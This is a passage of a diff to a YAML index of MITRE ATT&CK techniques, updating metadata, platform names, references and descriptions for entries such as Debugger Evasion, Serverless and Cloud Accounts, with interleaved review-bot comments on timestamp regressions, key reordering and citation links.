x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518
atomic_tests: []
T1538:
technique:
- modified: '2024-04-19T04:25:33.300Z'
+ modified: '2024-10-15T15:51:56.279Z'
name: Cloud Service Dashboard
description: |-
An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -51196,12 +51880,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
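Review bot: same platform rename as T1526 above (Azure AD, Office 365 and Google Workspace replaced by Office Suite and Identity Provider, version 1.3 to 1.4), so the same downstream-filter caveat applies to T1538; the only difference is the surviving key order (`IaaS` before `SaaS` here, the reverse in T1526), which is cosmetic and inherited from upstream.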
@@ -51226,7 +51909,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1622:
technique:
@@ -51281,7 +51963,7 @@ discovery:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
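Review bot: `modified` for T1622 moves backwards in time on this hunk (2022-05-11 to 2022-04-16); a last-modified timestamp that regresses is normally a sign the file was regenerated from a different upstream STIX snapshot rather than edited, so confirm the generator is reading the intended ATT&CK release before merging. Separately, the context lines show the description with `IsDebuggerPresent()`, `NtQueryInformationProcess()`, `BeingDebugged` and `OutputDebugStringW()` each broken onto their own line; that is how the multi-line string is stored upstream and is not introduced here, but it renders awkwardly and is worth reporting to the source rather than patching locally.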
@@ -51301,7 +51983,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1124:
@@ -51404,13 +52085,12 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1124
atomic_tests: []
resource-development:
T1583:
technique:
- modified: '2024-02-28T21:13:02.648Z'
+ modified: '2024-10-16T20:03:59.884Z'
name: Acquire Infrastructure
description: |-
Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -51421,7 +52101,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider use of services that may aid in tracking of newly
acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -51492,29 +52172,28 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.007:
technique:
- modified: '2022-10-20T21:20:22.578Z'
+ modified: '2024-07-01T20:24:16.562Z'
name: Serverless
description: |-
- Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+ Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
- Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+ Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
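Review bot: the rewritten description introduces a new citation key `GWS Apps Script Abuse 2021` and a link to T1665 (Hide Infrastructure); the matching `source_name` is added in the next hunk, so the citation resolves, and the version bump 1.0 to 1.1 matches a content change. The reordering of `x_mitre_contributors`, `x_mitre_detection`, `x_mitre_is_subtechnique` and `x_mitre_platforms` is pure movement with no value changes, which inflates the diff; if key ordering is now fixed by the generator, say so in the commit message. One wording nit inherited from upstream: the product is "Google Apps Script" (singular), while the new line says "Google Apps Scripts"; that belongs in an upstream report, not a local edit, if this file is generated.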
@@ -51538,15 +52217,18 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
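Review bot: the new reference URL on the `+ url:` line ends in `#google_vignette`, which is an ad-interstitial fragment appended by the site, not part of the article address; strip the fragment (or fix it in the upstream ATT&CK reference, if this file is generated from it) so the link is stable and does not trigger an ad overlay for readers. The `x_mitre_attack_spec_version` jump from 2.1.0 to 3.2.0 is consistent with the other objects in this patch.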
T1588.007:
technique:
- modified: '2024-04-15T23:49:14.558Z'
+ modified: '2024-09-12T19:18:36.583Z'
name: Artificial Intelligence
description: |
Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -51578,17 +52260,16 @@ resource-development:
url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
- source_name: OpenAI-CTI
description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
- by state-affiliated threat actors. Retrieved March 11, 2024.
- url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+ by state-affiliated threat actors. Retrieved September 12, 2024.
+ url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.008:
technique:
- modified: '2024-04-19T12:24:40.659Z'
+ modified: '2024-10-15T15:10:59.530Z'
name: Network Devices
description: |-
Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -51641,11 +52322,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.008:
technique:
- modified: '2023-04-17T15:32:39.470Z'
+ modified: '2024-10-16T20:10:08.246Z'
name: Malvertising
description: "Adversaries may purchase online advertisements that can be abused
to distribute malware to victims. Ads can be purchased to plant as well as
@@ -51681,7 +52361,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Tom Hegel
- - Goldstein Menachem
+ - Menachem Goldstein
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Pooja Natarajan, NEC Corporation India
@@ -51730,43 +52410,12 @@ resource-development:
url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.004:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
- type: attack-pattern
- created: '2020-10-01T02:14:18.044Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.004
- url: https://attack.mitre.org/techniques/T1588/004
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: Let's Encrypt FAQ
- url: https://letsencrypt.org/docs/faq/
- description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
- October 15, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.567Z'
name: Digital Certificates
description: |-
Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
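Review bot: the large removal at the top of T1588.004 (platforms, domains, object_marking_refs, id, type, created, created_by_ref and all five external_references) is a reorder, not a deletion; every removed item reappears in the next hunk in the new key order. I checked the five references by `source_name` (mitre-attack, DiginotarCompromise, Let's Encrypt FAQ, Splunk Kovar Certificates 2017, Recorded Future Beacon Certificates) and all are re-added, so nothing is lost, but a reviewer cannot see that from this hunk alone; a commit-message note that the generator now sorts keys would save the cross-check.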
@@ -51779,18 +52428,49 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+ created: '2020-10-01T02:14:18.044Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/004
+ external_id: T1588.004
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Let's Encrypt FAQ
+ description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+ October 15, 2020.
+ url: https://letsencrypt.org/docs/faq/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
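Review bot: the substantive changes buried in this re-added block are small and should be called out: the Recorded Future URL changes path (`/cobalt-strike-servers/` to `/research/cobalt-strike-servers`) with a new retrieval date of September 16, 2024, `revoked: false` and `x_mitre_deprecated: false` are added, and `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0, while `x_mitre_version` stays at 1.2. That is consistent with a metadata-only sync (no technique content changed), but the mismatch between a 2024 `modified` date and an unchanged version is the kind of thing reviewers will ask about, so it is worth one sentence in the commit message.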
T1583.002:
technique:
@@ -51812,7 +52492,7 @@ resource-development:
url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
be (ab)used by malicious actors. Retrieved October 3, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:49.702Z'
name: DNS Server
description: |-
Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
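Review bot: `modified` for T1583.002 regresses from 2022-04-25 to 2021-04-15, and the same backwards move appears for the other sub-techniques below (T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002, T1584.003, all from a 2022-04-25 or 2022-05-11 value to a 2021 date). Since the `14:00:00.188Z` timestamps being replaced share an identical time-of-day, they look like bulk-assigned values from an earlier import, and the new ones look like the upstream per-object timestamps; that is plausible, but please confirm the regenerated values come from the intended ATT&CK release so that anyone diffing releases by `modified` is not misled.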
@@ -51828,8 +52508,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.003:
technique:
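Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1583.002 with no replacement visible, and the same pair is dropped for T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002 and T1584.003 further down. Elsewhere in the patch `x_mitre_attack_spec_version` is kept and updated (3.1.0 or 3.2.0) rather than deleted, so either these objects are re-gaining the key outside the hunk context, or they are losing it entirely; if the latter, check that nothing downstream keys off that field (the removal of plain `spec_version` is consistent throughout and looks intentional).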
@@ -51851,7 +52529,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:32:34.604Z'
name: Digital Certificates
description: |-
Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -51871,8 +52549,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.001:
technique:
@@ -51911,7 +52587,7 @@ resource-development:
description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
a Russian Cyber Threat Group. Retrieved September 17, 2015.'
url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-14T17:14:27.890Z'
name: Malware
description: |-
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -51932,8 +52608,6 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.001:
technique:
@@ -51963,7 +52637,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:15:12.169Z'
name: Social Media Accounts
description: "Adversaries may compromise social media accounts that can be used
during targeting. For operations incorporating social engineering, the utilization
@@ -52000,8 +52674,6 @@ resource-development:
x_mitre_data_sources:
- 'Persona: Social Media'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1588.006:
technique:
@@ -52023,7 +52695,7 @@ resource-development:
url: https://nvd.nist.gov/
description: National Vulnerability Database. (n.d.). National Vulnerability
Database. Retrieved October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:16:32.119Z'
name: Vulnerabilities
description: |-
Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -52045,8 +52717,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.005:
technique:
@@ -52083,7 +52753,7 @@ resource-development:
description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
Numbered?. Retrieved May 15, 2017.
url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:14.664Z'
name: Botnet
description: 'Adversaries may buy, lease, or rent a network of compromised systems that
can be used during targeting. A botnet is a network of compromised systems
@@ -52105,8 +52775,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.004:
technique:
@@ -52168,7 +52836,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1587.002:
technique:
@@ -52190,7 +52857,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:07:08.549Z'
name: Code Signing Certificates
description: |-
Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -52208,8 +52875,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.003:
technique:
@@ -52244,7 +52909,7 @@ resource-development:
url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:59:02.770Z'
name: Virtual Private Server
description: |-
Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -52263,33 +52928,31 @@ resource-development:
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.003:
technique:
- modified: '2022-10-21T14:21:57.991Z'
+ modified: '2024-10-16T21:26:36.312Z'
name: Cloud Accounts
description: |-
- Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+ Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Francesco Bigarella
+ x_mitre_deprecated: false
x_mitre_detection: 'Much of this activity will take place outside the visibility
of the target organization, making detection of this behavior difficult. Detection
efforts may be focused on related stages of the adversary lifecycle, such
as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Francesco Bigarella
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
created: '2022-05-27T14:30:01.904Z'
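Review bot: the expanded description for T1586.003 adds messaging services (Twilio, SendGrid, AWS End User Messaging, SNS, SES) as a phishing/spam vector and cites two new keys, `Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022` and `Netcraft SendGrid 2024`; both `source_name` entries are added in the next hunk, so the citations resolve, and the version bump 1.0 to 1.1 is justified. Note that `x_mitre_detection` is unchanged and still only points at exfiltration-stage visibility, so the new messaging-service angle has no matching detection guidance; that is upstream text and not something to patch locally, but worth flagging upstream. The remaining movement (`x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_is_subtechnique`, `x_mitre_platforms`) is key reordering only.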
@@ -52299,10 +52962,19 @@ resource-development:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1586/003
external_id: T1586.003
+ - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+ description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+ Case Studies From the Wild. Retrieved March 9, 2023.'
+ url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
- source_name: Awake Security C2 Cloud
description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
Command & Control in the Cloud. Retrieved May 27, 2022.'
url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+ - source_name: Netcraft SendGrid 2024
